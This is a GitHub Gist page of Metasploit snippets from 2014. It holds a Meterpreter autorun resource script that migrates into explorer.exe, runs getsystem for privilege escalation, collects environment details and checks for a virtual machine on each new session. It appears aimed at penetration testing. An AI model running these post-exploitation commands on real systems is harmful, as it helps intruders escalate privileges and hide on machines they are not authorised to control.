Created
November 7, 2014 03:05
-
-
Save sckalath/358625fe37d8612508ab to your computer and use it in GitHub Desktop.
Metasploit snippets
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#autorun script (session.rc) | |
migrate -k -n explorer.exe | |
multi_console_command -cl "getsystem","getuid" | |
get_env | |
checkvm | |
#setting msf to use autorunscript above | |
set autorunscript multiscript.rb -rc /home/ryan/session.rc |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment